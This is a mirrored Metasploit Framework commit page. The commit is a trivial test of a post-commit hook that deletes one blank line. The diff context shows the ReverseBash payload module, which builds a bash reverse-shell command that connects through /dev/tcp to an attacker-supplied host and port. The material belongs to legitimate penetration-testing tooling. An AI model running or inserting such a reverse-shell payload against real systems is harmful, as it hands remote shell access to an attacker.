mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-11-12 11:52:01 +01:00
fixes #4. This is just a test of the post-commit hook
git-svn-id: file:///home/svn/framework3/trunk@4408 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
ce01a25e0c
commit
854607771c
@ -46,7 +46,6 @@ module ReverseBash
|
||||
fd = rand(200) + 20
|
||||
return "0<&#{fd}-;exec #{fd}<>/dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']};sh <&#{fd} >&#{fd} 2>&#{fd}";
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end end end end end
|
||||
|
Loading…
Reference in New Issue
Block a user